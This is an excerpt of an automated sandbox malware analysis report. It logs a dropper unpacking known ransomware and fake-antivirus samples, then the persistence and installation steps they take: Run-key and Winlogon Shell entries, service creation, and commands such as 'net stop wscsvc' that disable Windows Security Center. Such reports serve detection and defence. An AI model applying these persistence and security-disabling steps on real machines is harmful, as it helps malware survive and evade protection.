          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\Windows\870F.tmp
          Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\antivirus-platinum.exe
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeExecutable created and started: C:\Windows\302746537.exeJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@Krotten.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@Antivirus.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Fantom.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@NavaShield.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@PolyRansom.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityScanner.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\bzip2.dllJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@LPS2019.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\MSCOMCTL.OCXJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@SE2011.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@ViraLock.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\302746537.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@VAV2008.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\COMCTL32.OCXJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@BadRabbit.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@Cerber5.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@Petya.A.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@DeriaLock.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\antivirus-platinum.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@PCDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dllJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityCentral.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@RegistrySmart.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@Birele.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\libltdl3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@Xyeta.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeFile created: C:\Users\user\AppData\Local\6AdwCleaner.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\COMCTL32.OCXJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\antivirus-platinum.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\MSCOMCTL.OCXJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\302746537.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AntivirusJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Windows\antivirus-platinum.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AntivirusJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AntivirusJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E29534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,20_2_04E29534
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\302746537.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\302746537.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
